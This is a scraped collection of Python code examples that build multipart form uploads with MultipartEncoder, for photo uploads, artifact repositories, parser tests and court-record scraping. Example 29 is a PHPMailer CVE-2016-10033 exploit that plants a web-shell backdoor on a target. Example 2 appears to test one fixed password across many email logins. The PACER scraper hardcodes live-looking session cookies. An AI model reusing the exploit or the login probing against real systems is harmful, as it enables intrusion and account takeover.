Ejemplo n.º 1
0
 def save(self,cnxml):
     """Push new cnxml to RME"""
     data = MultipartEncoder(fields={'importFile':('index.cnxml', cnxml.decode('utf-8')),
         'format':'plain', 'submit':'Import', 'form.submitted':'1',
         'came_from':'module_text'})
     r = requests.post('%s/module_import_form' % self.url, data = data.to_string(), 
         auth = self.auth, headers = {'Content-Type': data.content_type})
Ejemplo n.º 2
0
def postold(csrfmiddle, cookie, mail):
	url = "https://ad.toutiao.com/old_login/"

	files = {
		"csrfmiddlewaretoken":(None, str(csrfmiddle)),
		"email":(None, str(mail)),
		"password":(None, "9090"),
	}


	from requests_toolbelt import MultipartEncoder
	
	m = MultipartEncoder(fields=files, boundary="----WebKitFormBoundaryRgFdemk5CNNZaY6j")

	headers = {
		'Accept':'*/*',
		'Accept-Encoding':'gzip, deflate, br',
		'Accept-Language':'en-US,en;q=0.8,zh;q=0.6',
		'Connection':'keep-alive',
		'Content-Type':m.content_type,
		'Host':'ad.toutiao.com',
		'Cookie':cookie,
		'Origin':'https://ad.toutiao.com',
		'Referer':'https://ad.toutiao.com/old_login/',
		'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
		'X-Requested-With':'XMLHttpRequest',
	}

	r = ss.post(url, headers=headers, data=m.to_string(), verify=False)
	pp = json.loads(r.text)
	#print  pp
	if pp['code'] == 1009:
		print mail, "....", r.text
Ejemplo n.º 3
0
def upload_photo(self, photo, caption=None, upload_id=None):
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))
    if not compatible_aspect_ratio(get_image_size(photo)):
        self.logger.info('Photo does not have a compatible '
                         'photo aspect ratio.')
        return False
    data = {
        'upload_id': upload_id,
        '_uuid': self.uuid,
        '_csrftoken': self.token,
        'image_compression': '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}',
        'photo': ('pending_media_%s.jpg' % upload_id, open(photo, 'rb'), 'application/octet-stream', {'Content-Transfer-Encoding': 'binary'})
    }
    m = MultipartEncoder(data, boundary=self.uuid)
    self.session.headers.update({'X-IG-Capabilities': '3Q4=',
                                 'X-IG-Connection-Type': 'WIFI',
                                 'Cookie2': '$Version=1',
                                 'Accept-Language': 'en-US',
                                 'Accept-Encoding': 'gzip, deflate',
                                 'Content-type': m.content_type,
                                 'Connection': 'close',
                                 'User-Agent': self.user_agent})
    response = self.session.post(
        config.API_URL + "upload/photo/", data=m.to_string())
    if response.status_code == 200:
        if self.configure_photo(upload_id, photo, caption):
            self.expose()
            return True
    return False
Ejemplo n.º 4
0
    def _upload_artifact(self, local_artifact, path_prefix, repo_id, hostname_for_download=None, use_direct_put=False):

        filename = os.path.basename(local_artifact.local_path)
        logger.info('-> Uploading %s', filename)
        logger.debug('local artifact: %s', local_artifact)

        # rgavf stands for repo-group-local_artifact-version-filename
        gavf = '{group}/{name}/{ver}/{filename}'.format(group=local_artifact.group.replace('.', '/'),
                                                        name=local_artifact.artifact, ver=local_artifact.version,
                                                        filename=filename)
        rgavf = '{repo_id}/{gavf}'.format(repo_id=repo_id, gavf=gavf)

        with open(local_artifact.local_path, 'rb') as f:
            if not use_direct_put:
                data = {
                    'g':local_artifact.group,
                    'a':local_artifact.artifact,
                    'v':local_artifact.version,
                    'r':repo_id,
                    'e': local_artifact.extension,
                    'p': local_artifact.extension,
                    'hasPom': 'false'
                }


                data_list = data.items()
                data_list.append( ('file', (filename, f, 'text/plain') ))
                m_for_logging = MultipartEncoder(fields=data_list)
                logger.debug('payload: %s', m_for_logging.to_string())

                f.seek(0)
                m = MultipartEncoder(fields=data_list)
                headers = {'Content-Type': m.content_type}

                self._send('service/local/artifact/maven/content', method='POST', data=m, headers=headers)

                result = RemoteArtifact(group=local_artifact.group, artifact=local_artifact.artifact,
                                      version=local_artifact.version, classifier=local_artifact.classifier,
                                      extension=local_artifact.extension, repo_id=repo_id)
                self.resolve_artifact(result)
                return result

            else:
                headers = {'Content-Type': 'application/x-rpm'}
                remote_path = '{path_prefix}/{rgavf}'.format(path_prefix=path_prefix, rgavf=rgavf)
                self._send(remote_path, method='PUT', headers=headers, data=f)

                # if not specified, use repository url
                hostname_for_download = hostname_for_download or self._repository_url
                url = '{hostname}/content/repositories/{rgavf}'.format(hostname=hostname_for_download, rgavf=rgavf)

                # get classifier and extension from nexus
                path = 'service/local/repositories/{repo_id}/content/{gavf}?describe=maven2'.format(repo_id=repo_id, gavf=gavf)
                maven_metadata = self._send_json(path)['data']

                return RemoteArtifact(group=maven_metadata['groupId'], artifact=maven_metadata['artifactId'],
                                      version=maven_metadata['version'], classifier=maven_metadata.get('classifier', ''),
                                      extension=maven_metadata.get('extension', ''), url=url, repo_id=repo_id)
Ejemplo n.º 5
0
    def test_post_file_error(self):
        file = StringIO('sample_name\tbarcode\nSample 1\t000000001\n')
        m = MultipartEncoder(
            fields={
                'sample-set': 'Sample Set 1',
                'type': 'test',
                'location': 'the freezer',
                'file': ('test_bc.txt', file, 'text/plain')}
        )

        self.assertEqual(len(pm.sample.Sample.search(sample_type='test')), 0)
        obs = self.post('/sample/add/', m.to_string(),
                        headers={'Content-Type': m.content_type})
        self.assertEqual(obs.code, 200)
        self.assertIn('The object with name \'Sample 1\' already exists in '
                      'table \'sample\'', obs.body.decode('utf-8'))
        self.assertEqual(len(pm.sample.Sample.search(sample_type='test')), 0)
Ejemplo n.º 6
0
    def test_post_file(self):
        file = StringIO('sample_name\tother_col\ntest1\tval1\ntest2\tval2\n')
        m = MultipartEncoder(
            fields={
                'sample-set': 'Sample Set 1',
                'type': 'test',
                'location': 'the freezer',
                'file': ('test_bc.txt', file, 'text/plain')}
        )

        self.assertEqual(len(pm.sample.Sample.search(sample_type='test')), 0)
        obs = self.post('/sample/add/', m.to_string(),
                        headers={'Content-Type': m.content_type})
        self.assertEqual(obs.code, 200)
        self.assertIn('Created 2 samples from test_bc.txt',
                      obs.body.decode('utf-8'))
        self.assertEqual(len(pm.sample.Sample.search(sample_type='test')), 2)
Ejemplo n.º 7
0
def detect_face():
    file = request.files['file']
    file.save('input.jpg')
    test1 = shrink_img(cv2.imread('input.jpg'))
    gray_img = cv2.cvtColor(test1, cv2.COLOR_BGR2GRAY)
    haar_face_cascade = cv2.CascadeClassifier('lbpcascade_frontalface.xml')
    faces = haar_face_cascade.detectMultiScale(gray_img,
                                               scaleFactor=1.2,
                                               minNeighbors=5)
    t1_start = time.time()
    for (x, y, w, h) in faces:
        cv2.rectangle(test1, (x, y), (x + w, y + h), (0, 255, 0), 2)
    cv2.imwrite('output.jpg', test1)

    faces_json = json.dumps(faces.tolist())
    fields = {}
    fields['image'] = ('output.jpg', open('output.jpg', 'rb'), 'image/jpeg')
    fields['face_rects'] = ('face_rects', faces_json, 'application/json')
    m = MultipartEncoder(fields)
    return Response(m.to_string(), mimetype=m.content_type)
Ejemplo n.º 8
0
def test_case_insensitive_content_type():
    content_type_header = 'Content-Type'

    for header_key in (
            content_type_header,
            content_type_header.lower(),
            content_type_header.upper(),
            'cOnTeNt-tYPe',
    ):
        target = ValueTarget()

        encoder = MultipartEncoder(fields={'value': 'hello world'})

        parser = StreamingFormDataParser(
            headers={header_key: encoder.content_type})
        parser.register('value', target)

        parser.data_received(encoder.to_string())

        assert target.value == b'hello world'
Ejemplo n.º 9
0
def test_chunked_single():
    expected_value = 'hello world'

    target = ValueTarget()

    encoder = MultipartEncoder(fields={'value': expected_value})

    body = encoder.to_string()

    parser = StreamingFormDataParser(
        headers={'Content-Type': encoder.content_type}
    )
    parser.register('value', target)

    index = body.index(b'world')

    parser.data_received(body[:index])
    parser.data_received(body[index:])

    assert target.value == expected_value.encode('utf-8')
 def uploadPhoto(self, photo, caption=None, upload_id=None):
     if upload_id is None:
         upload_id = str(int(time.time() * 1000))
     data = {
         'upload_id':
         upload_id,
         '_uuid':
         self.uuid,
         '_csrftoken':
         self.token,
         'image_compression':
         '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}',
         'photo': ('pending_media_%s.jpg' % upload_id, open(photo, 'rb'),
                   'application/octet-stream', {
                       'Content-Transfer-Encoding': 'binary'
                   })
     }
     m = MultipartEncoder(data, boundary=self.uuid)
     self.s.headers.update({
         'X-IG-Capabilities': '3Q4=',
         'X-IG-Connection-Type': 'WIFI',
         'Cookie2': '$Version=1',
         'Accept-Language': 'en-US',
         'Accept-Encoding': 'gzip, deflate',
         'Content-type': m.content_type,
         'Connection': 'close',
         'User-Agent': self.USER_AGENT
     })
     response = self.s.post(self.API_URL + "upload/photo/",
                            data=m.to_string())
     self.logger.debug(".uploadPhoto response: status=%s content=%s",
                       response.status_code, response.content)
     if response.status_code == 200:
         configure_result = self.configure(upload_id, photo, caption)
         self.logger.debug(".uploadPhoto configure response: %s",
                           configure_result)
         if configure_result:
             expose_result = self.expose()
             self.logger.debug(".uploadPhoto expose response: %s",
                               expose_result)
     return False
Ejemplo n.º 11
0
def uploadPhoto(self, photo, caption=None, upload_id=None):
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))

    if not compatibleAspectRatio(getImageSize(photo)):
        self.logger.info('Not compatible photo aspect ratio')
        return False
    data = {
        'upload_id':
        upload_id,
        '_uuid':
        self.project.get_uuid(),
        '_csrftoken':
        self.token,
        'image_compression':
        '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}',
        'photo': ('pending_media_%s.jpg' % upload_id, open(photo, 'rb'),
                  'application/octet-stream', {
                      'Content-Transfer-Encoding': 'binary'
                  })
    }

    m = MultipartEncoder(data, boundary=self.project.get_uuid())
    self.s.headers.update({
        'X-IG-Capabilities': '3Q4=',
        'X-IG-Connection-Type': 'WIFI',
        'Cookie2': '$Version=1',
        'Accept-Language': 'en-US',
        'Accept-Encoding': 'gzip, deflate',
        'Content-type': m.content_type,
        'Connection': 'close',
        'User-Agent': settings.NOIRE['USER_AGENT']
    })
    response = self.s.post(settings.NOIRE['API_URL'] + "upload/photo/",
                           data=m.to_string())

    if response.status_code == 200:
        if self.configurePhoto(upload_id, photo, caption):
            self.expose()
            return True
    return False
Ejemplo n.º 12
0
def upload_photo(self, photo, caption=None, upload_id=None, from_video=False):
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))
    if not from_video:
        photo = resize_image(photo)
    if not photo:
        return False
    if not compatible_aspect_ratio(get_image_size(photo)):
        self.logger.info('Photo does not have a compatible '
                         'photo aspect ratio.')
        return False

    with open(photo, 'rb') as f:
        photo_bytes = f.read()

    data = {
        'upload_id': upload_id,
        '_uuid': self.uuid,
        '_csrftoken': self.token,
        'image_compression': '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}',
        'photo': ('pending_media_%s.jpg' % upload_id, photo_bytes, 'application/octet-stream', {'Content-Transfer-Encoding': 'binary'})
    }
    m = MultipartEncoder(data, boundary=self.uuid)
    self.session.headers.update({'X-IG-Capabilities': '3Q4=',
                                 'X-IG-Connection-Type': 'WIFI',
                                 'Cookie2': '$Version=1',
                                 'Accept-Language': 'en-US',
                                 'Accept-Encoding': 'gzip, deflate',
                                 'Content-type': m.content_type,
                                 'Connection': 'close',
                                 'User-Agent': self.user_agent})
    response = self.session.post(
        config.API_URL + "upload/photo/", data=m.to_string())

    if response.status_code == 200:
        if self.configure_photo(upload_id, photo, caption):
            self.expose()
            from os import rename
            rename(photo, "{}.REMOVE_ME".format(photo))
            return True
    return False
Ejemplo n.º 13
0
 def change_profile_pix(self, input_name, filename, file_address):
     self.uuid = self.generate_uuid(False)
     url_change_profile_pix = self.url_change_profile_pix
     data = {input_name: (filename + '.jpg', open(file_address, 'rb'), 'image/jpeg')}
     m = MultipartEncoder(data, boundary=self.uuid)
     self.s.headers.update({'Content-Type': 'multipart/form-data; boundary=' + self.uuid})
     r = self.s.post(url_change_profile_pix, data=m.to_string())
     all_data = json.loads(r.text)
     changed = False
     if "changed_profile" in all_data:
         if all_data["changed_profile"]:
             changed = True
     if changed:
         log_text = "Profile Pix Successfully Changed"
         returnValue = True
     else:
         log_text = "Profile Pix Upload Failed!"
         returnValue = False
     print(log_text)
     self.s.headers.update({'Content-Type': self.default_content_type})
     return returnValue
Ejemplo n.º 14
0
def test_content_type_passed_to_target():
    filename = 'image-600x400.png'

    with open_dataset(filename) as dataset_:
        expected_data = dataset_.read()

    target = ValueTarget()

    with open_dataset(filename) as file_:
        encoder = MultipartEncoder(
            fields={filename: (filename, file_, 'image/png')})

        parser = StreamingFormDataParser(
            headers={'Content-Type': encoder.content_type})

        parser.register(filename, target)

        parser.data_received(encoder.to_string())

        assert target.value == expected_data
        assert target.multipart_content_type == 'image/png'
Ejemplo n.º 15
0
 def parse7(self, response):
     #with open("pacer_html5555.html",'w') as f1:
     #    f1.write(response.body)valign="top"
     list1=response.xpath('//*[@id="cmecfMainContent"]/center[1]/table/tr[@valign="top"]')
     #list1=response.xpath('//*[@id="cmecfMainContent"]/center[1]/table/tr[2]')
     for li in list1:
         #print li.extract()
         try: 
             case_number=li.xpath('td[1]/a//text()').extract()[0]
             case_name=li.xpath('td[1]/b/text()').extract()[0]
         except:
             case_number=""
             case_name=""
         link=li.xpath('td[@align="center"]/a/@href').extract()[0]
         codes=li.xpath('td[@align="center"]/a/@onclick').extract()[0]
         description=", ".join(li.xpath('td[4]//text()').extract())
         date_filed=li.xpath('td[2]/text()').extract()[0]
         #print case_number,case_name,link,codes,description,date_filed
         #link=response.xpath('//*[@id="cmecfMainContent"]/center[1]/table/tr[2]/td[3]/a/@href').extract()[0]
         #codes=response.xpath('//*[@id="cmecfMainContent"]/center[1]/table/tr[2]/td[3]/a/@onclick').extract()[0]
         #print link, codes
         code1=codes.split('(')[1].split(',')[1].replace("'","").replace('"','').replace(" ","")
         code2=codes.split('(')[1].split(',')[2].replace("'","").replace('"','').replace(" ","")
         code3=codes.split('(')[1].split(',')[5].replace("'","").replace('"','').replace(" ","")
         form_data={'caseid':code1, 'de_seq_num':code2, 'got_receipt':'1', 'pdf_toggle_possible':code3}
         me = MultipartEncoder(fields=form_data)
         me_boundary = me.boundary[2:]  #need this in headers
         me_length = me.len             #need this in headers
         me_body = me.to_string()
         header={'Connection': 'keep-alive' , 'Cache-Control': 'max-age=0' , 'Origin': 'https://ecf.almd.uscourts.gov' , 'Upgrade-Insecure-Requests': '1' , 'Content-Type': 'multipart/form-data; charset=utf-8; boundary=' + me_boundary,  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36' , 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' , 'Referer': 'https://ecf.almd.uscourts.gov/' , 'Accept-Encoding': 'gzip, deflate, br' , 'Accept-Language': 'en-US,en;q=0.9'}
         req=scrapy.Request(link, meta = {'dont_redirect': True,'handle_httpstatus_list': [500,302]}, body=me_body, headers=header, callback=self.parse8, method="POST")
         req.cookies={'_ga':'GA1.2.1437274789.1534401822', 'ClientValidation':"", 'ClientCodeDescription':"", 'MENU':'slow', 'PacerSession':'0oxdQUxn4oxv1KlUJAvfr4kkFQEROH2k0tiDHGNeUEdE2oO5N3NeEJmy5AsVBQiPvefaUJSXI9DSOfshoFpoY94Bgv4EJaiC2mt7Zv2ecmzRpIT4nBqY2COBdjf3YQ0Q', 'NextGenCSO':'0oxdQUxn4oxv1KlUJAvfr4kkFQEROH2k0tiDHGNeUEdE2oO5N3NeEJmy5AsVBQiPvefaUJSXI9DSOfshoFpoY94Bgv4EJaiC2mt7Zv2ecmzRpIT4nBqY2COBdjf3YQ0Q', 'PacerClientCode':'Lumina', 'PacerClient':"", 'ClientDesc':"", 'PacerPref':"receipt=Y"}
         req.meta['pdfname']=response.meta['base_url'].split('/')[2].replace('.','_')+"_"+code1+"_"+code2+"_"+code3+".pdf"
         req.meta['base_url']=response.meta['base_url']
         req.meta['case_number']=case_number
         req.meta['case_name']=case_name
         req.meta['description']=description
         req.meta['date_filed']=date_filed
         req.meta['form_data']=form_data
         yield req
def get_model(model_id):
    """ Try to download a specific model if allowed.
        
        Args:
            model_id (str) : model's id.
        Returns:
            Response : If allowed, returns serialized model.
    """

    # If not Allowed
    check = mm.is_model_copy_allowed(model_id)
    response = {}
    if not check["success"]:  # If not allowed
        if check["error"] == mm.MODEL_NOT_FOUND_MSG:
            status_code = 404  # Not Found
            response["error"] = mm.Model_NOT_FOUND_MSG
        else:
            status_code = 403  # Forbidden
            response["error"] = mm.NOT_ALLOWED_TO_DOWNLOAD_MSG
        return Response(json.dumps(response),
                        status=status_code,
                        mimetype="application/json")

    # If allowed
    result = mm.get_serialized_model_with_id(model_id)

    if result["success"]:
        # Use correct encoding
        response = {
            "serialized_model": result["serialized_model"].decode("ISO-8859-1")
        }

        # If model is large split it in multiple parts
        if sys.getsizeof(response["serialized_model"]) >= MODEL_LIMIT_SIZE:
            form = MultipartEncoder(response)
            return Response(form.to_string(), mimetype=form.content_type)
        else:
            return Response(json.dumps(response),
                            status=200,
                            mimetype="application/json")
Ejemplo n.º 17
0
def test_chunked_multiple():
    expected_first_value = 'foo' * 1000
    expected_second_value = 'bar' * 1000
    expected_third_value = 'baz' * 1000

    first = ValueTarget()
    second = ValueTarget()
    third = ValueTarget()

    encoder = MultipartEncoder(
        fields={
            'first': expected_first_value,
            'second': expected_second_value,
            'third': expected_third_value,
        }
    )

    body = encoder.to_string()

    parser = StreamingFormDataParser(
        headers={'Content-Type': encoder.content_type}
    )

    parser.register('first', first)
    parser.register('second', second)
    parser.register('third', third)

    chunks = []
    size = 100

    while len(body):
        chunks.append(body[:size])
        body = body[size:]

    for chunk in chunks:
        parser.data_received(chunk)

    assert first.value == expected_first_value.encode('utf-8')
    assert second.value == expected_second_value.encode('utf-8')
    assert third.value == expected_third_value.encode('utf-8')
Ejemplo n.º 18
0
 def test_send_mail(self, mock_send_mail_handler):
     # PREPARE DATA
     template = "accounts_change_password"
     url_reverse = reverse('api:mail-list')
     params = {
         "name": faker.name(),
         "public_url": faker.url(),
         "recipients": [faker.email()],
     }
     data = {
         "template": template,
         "params": json.dumps(params),
         "lang": "en",
     }
     m = MultipartEncoder(fields=data)
     # DO ACTION
     response = self.client.post(url_reverse,
                                 data=m.to_string(),
                                 content_type=m.content_type)
     # ASSERTS
     self.assertTrue(status.is_success(response.status_code))
     self.assertTrue(mock_send_mail_handler.called)
Ejemplo n.º 19
0
    def _replace_at(self, name, value):
        """
        Replace the part for the given name with the given value and return the multipart data as a string. The
        original parts are not changed.
        :param name: name as string
        :param value: value as string
        :return: multipart data as string
        """
        # copy
        parts = deepcopy(self._parts)

        # replace text
        if isinstance(parts[name], list):
            parts[name][1] = value
        else:
            parts[name] = value

        # encode
        encoder = MultipartEncoder(parts, boundary=self._boundary)
        replacement = encoder.to_string().decode()

        return replacement
Ejemplo n.º 20
0
def test_basic_multiple():
    first = ValueTarget()
    second = ValueTarget()
    third = ValueTarget()

    encoder = MultipartEncoder(
        fields={'first': 'foo', 'second': 'bar', 'third': 'baz'}
    )

    parser = StreamingFormDataParser(
        headers={'Content-Type': encoder.content_type}
    )

    parser.register('first', first)
    parser.register('second', second)
    parser.register('third', third)

    parser.data_received(encoder.to_string())

    assert first.value == b'foo'
    assert second.value == b'bar'
    assert third.value == b'baz'
Ejemplo n.º 21
0
 def upload_media(self, input_name, filename, mention, media_comment):
     self.uuid = self.generate_uuid(False)
     url_upload = self.url_upload
     upload_id = str(int(time.time() * 1000))
     data = {
         "upload_id": upload_id,
         input_name: (input_name+'.jpg', open(filename, 'rb'), 'image/jpeg')
     }
     m = MultipartEncoder(data, boundary=self.uuid)
     self.s.headers.update({'Content-Type': 'multipart/form-data; boundary='+self.uuid})
     self.s.headers.update({'Referer': 'https://www.instagram.com/create/style/'})
     r = self.s.post(url_upload, data=m.to_string())
     all_data = json.loads(r.text)
     trueAggregate = 0
     if "upload_id" in all_data:
         upload_id = all_data["upload_id"]
         print('UPLOAD ID: '+str(upload_id))
         trueAggregate += 1
         all_data = self.add_caption(upload_id, mention)
         print(all_data)
         if len(all_data) > 0:
             user_id = all_data["media"]["caption"]["user_id"]
             media_id_user_id = all_data["media"]["id"]
             media_id = str(media_id_user_id).replace("_"+str(user_id), "")
             if(len(media_id) > 0):
                 trueAggregate += 1
             self.like(media_id)
             do_comment = self.comment(media_id, media_comment)
             print(do_comment)
             self.default_headers()
             if trueAggregate == 2:
                 return True
             else:
                 return False
         else:
             #self.keep_following = False
             print('Media caption configuration failed. So comment was added')
             self.comment(upload_id, mention)
             return True
    def do_test(self, data, dataset_name):
        useful_numbers = get_useful_numbers()

        idx = 0
        for file_size in chain([
                0,
        ], useful_numbers):
            idx += 1

            original_data = data[0:file_size]
            with BytesIO(data[0:file_size]) as dataset_:
                fields = {
                    'file': ('file.dat', dataset_, 'binary/octet-stream')
                }
                encoder = MultipartEncoder(fields=fields)
                content_type = encoder.content_type
                multipart_data = encoder.to_string()

            self.subTest(idx, 'DifferentFileSizes.' + dataset_name, 1024,
                         original_data, content_type, multipart_data,
                         'file.dat')

        self.assertEqual(idx, len(useful_numbers) + 1)
Ejemplo n.º 23
0
    def upload_record_without_photo(self, record):
        """ 不带自拍,上传跑步记录
        """
        m = MultipartEncoder(
            fields={
                'userId': str(self.studentID),
                'duration': str(record.duration),
                'date': str(record.date),  # 后端好像会根据日期来判断是否重复发包
                'detail': json.dumps(record.detail),  # 路径似乎并不会用来查重
                'misc': json.dumps({"agent": "Android v1.2+"}),
                'step': str(record.step),
            })
        # self.logger.debug(record.__dict__)
        # self.logger.debug(m.to_string()) # 注意! m.to_string() 只能输出一次,第二次将会输出空字节,因此不要用这个方法来调试!
        # return
        respJson = self.post("record/{userId}".format(userId=self.studentID),
                             data=m.to_string(),
                             headers={'Content-Type': m.content_type},
                             auth=self.auth)

        if not respJson["data"]["verified"]:
            raise PKURunnerNotVerifiedError(
                "record is not verified, check your running params setting.")
Ejemplo n.º 24
0
    def add_employee(self, emp_id, first_name, last_name, file=None):
        resp = self.sess.get(f'{BASE_URL}/pim/addEmployee')
        result = re.search('value="(.*)" id="csrf_token"', resp.text)
        csrf_token = result.group(1)

        data = {
            'firstName': first_name,
            'lastName': last_name,
            'employeeId': emp_id,
            'status': 'Enabled',
            'empNumber': emp_id,
            '_csrf_token': csrf_token
        }
        if file:
            data.update(
                {'photofile': ('profile', open(file, 'rb'), 'image/png')})

        mpe = MultipartEncoder(fields=data)

        header = {'Content-Type': mpe.content_type}
        return self.sess.post(f'{BASE_URL}/pim/addEmployee',
                              headers=header,
                              data=mpe.to_string())
Ejemplo n.º 25
0
    def uploadPhoto(s,id,photo):
        id=str(id)
        s.debug_print('attempting to upload %s to event %s' %( id, photo))
        
        url = s.api_url + 'photos.json'
        
        files = { 'token':      (None, s.token),
                    'event_id': (None, id),
                    'image':    (photo, open(photo,'rb'),mimetypes.guess_type(photo)[0])}
        
        #need to use MultipartEncoder to properly set boundary. 
        #this isn't necessary, and it works without this boundary,
        #but this is what 2.6.9.6 uses as their setting, so I figured 
        #it couldn't hurt. Useragent also matches :)
        m = MultipartEncoder(files,boundary='-----------------------------28947758029299')
        headers = {'User-Agent':'RestSharp/105.2.3.0',
                'Content-Type': m.content_type,}

        r = requests.post(url,headers=headers,data=m.to_string())
        #print r.headers
        #print r.text
        print r.content
        return
Ejemplo n.º 26
0
    def login_post(self):
        captcha = self.get_captcha()
        time_span = str(int(time.time() * 1000))
        data = {
            "client_id": "c3cef7c66a1843f8b3a9e6a1e3160e20",
            "grant_type": "password",
            "timestamp": time_span,
            "source": "com.zhihu.web",
            "signature": self.encry_signature(time_span),
            "username": "******" + self.phonenumber,
            "password": self.password,
            "captcha": captcha,
            "lang": "en",
            "ref_source": "homepage",
            "utm_source": ""
        }

        boundary = self.random_boundary()
        encode_data = MultipartEncoder(data, boundary=boundary)
        self.session.headers["Content-Type"] = encode_data.content_type

        if self.session.cookies.get("_xsrf", None):
            self.session.headers["X-Xsrftoken"] = self.session.cookies.get(
                "_xsrf")
        if self.session.cookies.get("d_c0", None):
            self.session.headers["X-UDID"] = self.session.cookies.get(
                "d_c0").split("|")[0].strip('"')

        login_url = "https://www.zhihu.com/api/v3/oauth/sign_in"
        r = self.session.post(login_url, data=encode_data.to_string())
        result = r.json()
        if not result.get("error", None):
            print(result)
            return True
        else:
            print(result.get("error").get("message"))
            return False
Ejemplo n.º 27
0
 def putAttachments(self, rowId, manifest: Sequence["OdkxLocalFile"],
                    data: List[bytes]):
     """
     :param manifest: ex. FilesystemAttachmentStore().getManifest(rowId)
     :param data: list of byte arrays
     """
     fields = {
         f"{srv.filename}": (f"{srv.filename}", d, srv.contentType
                             or "image/jpg", {
                                 "Name": "file"
                             })
         for srv, d in zip(manifest, data)
     }
     multi_image = MultipartEncoder(fields=fields)
     for part in multi_image.parts:
         # this is fix for odkx-sync-endpoint using custom content disposition "file"
         part.headers = part.headers.replace(b"form-data;", b"file;")
     #didn't get it to work as stream
     payload = multi_image.to_string()
     return self.connection.POST(
         self.getTableDefinitionRoot() + "/attachments/" + rowId +
         "/upload",
         data=payload,
         headers={"Content-Type": multi_image.content_type})
Ejemplo n.º 28
0
def connection_speed_test():
    """Connection speed test."""
    response_body = {}
    status_code = None

    try:
        _worker_id = request.args.get("worker_id", None)
        _random = request.args.get("random", None)
        _is_ping = request.args.get("is_ping", None)

        if not _worker_id or not _random:
            raise PyGridError

        # If GET method
        if request.method == "GET":
            if _is_ping is None:
                # Download data sample (64MB)
                data_sample = b"x" * 67108864  # 64 Megabyte
                response = {"sample": data_sample}
                form = MultipartEncoder(response)
                return Response(form.to_string(), mimetype=form.content_type)
            else:
                status_code = 200  # Success
        elif request.method == "POST":  # Otherwise, it's POST method
            status_code = 200  # Success

    except PyGridError as e:
        status_code = 400  # Bad Request
        response_body[RESPONSE_MSG.ERROR] = str(e)
    except Exception as e:
        status_code = 500  # Internal Server Error
        response_body[RESPONSE_MSG.ERROR] = str(e)

    return Response(json.dumps(response_body),
                    status=status_code,
                    mimetype="application/json")
Ejemplo n.º 29
0
)
print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(
    " Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n"
)

target = 'http://*****:*****@protonmail.com',
    'message': 'Pwned'
}

m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')

headers = {'User-Agent': 'curl/7.47.0', 'Content-Type': m.content_type}

proxies = {'http': 'localhost:8081', 'https': 'localhost:8081'}

print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(), headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target + backdoor, headers=headers)
if r.status_code == 200:
    print('[+]  ExPLoITeD ' + target)
Ejemplo n.º 30
0
 def parse8(self, response):
     #with open("pacer_html101010102.html",'w') as f1:
     #    f1.write(response.body)
     try:
         if "".join(response.xpath('//*[@id="cmecfMainContent"]/table/tr[1]/td[1]/b//text()').extract()).replace(' ','').replace('\n','').replace('\t','').replace('\r','').lower().find('documentnumber')>-1:
             url=response.xpath('//*[@id="cmecfMainContent"]/table/tr[1]/td[1]/a/@href').extract()[0]
             form_data=response.meta['form_data']
             me = MultipartEncoder(fields=form_data)
             me_boundary = me.boundary[2:]  #need this in headers
             me_length = me.len             #need this in headers
             me_body = me.to_string()
             header={'Connection': 'keep-alive' , 'Cache-Control': 'max-age=0' , 'Origin': 'https://ecf.almd.uscourts.gov' , 'Upgrade-Insecure-Requests': '1' , 'Content-Type': 'multipart/form-data; charset=utf-8; boundary=' + me_boundary,  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36' , 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' , 'Referer': 'https://ecf.almd.uscourts.gov/' , 'Accept-Encoding': 'gzip, deflate, br' , 'Accept-Language': 'en-US,en;q=0.9'}
             if url.find('http')>-1:
                 req=scrapy.Request(url, meta = {'dont_redirect': True,'handle_httpstatus_list': [500,302]}, body=me_body, headers=header, callback=self.parse9, method="POST")
             else:
                 req=scrapy.Request(response.meta['base_url'].rstrip('/')+url, meta = {'dont_redirect': True,'handle_httpstatus_list': [500,302]}, body=me_body, headers=header, callback=self.parse9, method="POST")
             req.cookies={'_ga':'GA1.2.1437274789.1534401822', 'ClientValidation':"", 'ClientCodeDescription':"", 'MENU':'slow', 'PacerSession':'0oxdQUxn4oxv1KlUJAvfr4kkFQEROH2k0tiDHGNeUEdE2oO5N3NeEJmy5AsVBQiPvefaUJSXI9DSOfshoFpoY94Bgv4EJaiC2mt7Zv2ecmzRpIT4nBqY2COBdjf3YQ0Q', 'NextGenCSO':'0oxdQUxn4oxv1KlUJAvfr4kkFQEROH2k0tiDHGNeUEdE2oO5N3NeEJmy5AsVBQiPvefaUJSXI9DSOfshoFpoY94Bgv4EJaiC2mt7Zv2ecmzRpIT4nBqY2COBdjf3YQ0Q', 'PacerClientCode':'Lumina', 'PacerClient':"", 'ClientDesc':"", 'PacerPref':"receipt=Y"}
             req.meta['pdfname']=response.meta['pdfname']
             req.meta['base_url']=response.meta['base_url']
             req.meta['case_number']=response.meta['case_number']
             req.meta['case_name']=response.meta['case_name']
             req.meta['description']=response.meta['description']
             req.meta['date_filed']=response.meta['date_filed']
             #req.meta['code_number']=response.meta['code_number']
             req.meta['initial_url']=response.meta['initial_url']
             yield req
         else:
             #print "else part of parse8"
             try:
                 pdflink=response.meta['base_url'].rstrip('/')+response.xpath('//iframe/@src').extract()[0]
